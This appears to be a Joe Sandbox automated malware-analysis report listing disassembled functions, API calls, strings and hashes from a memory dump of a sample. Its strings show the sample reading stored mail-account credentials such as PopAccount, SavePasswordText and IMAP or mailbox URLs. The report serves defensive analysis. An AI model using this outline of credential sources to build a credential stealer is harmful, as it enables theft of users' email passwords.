                                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                                    • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                                    • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                    • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                    • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,75C50A60,?,00000000,?,?,?,0040CF60,75C50A60), ref: 00404AB8
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75C50A60), ref: 00404ADE
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                    • API String ID: 888011440-2039793938
                                                                                                                                                                                                                                    • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                                    • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
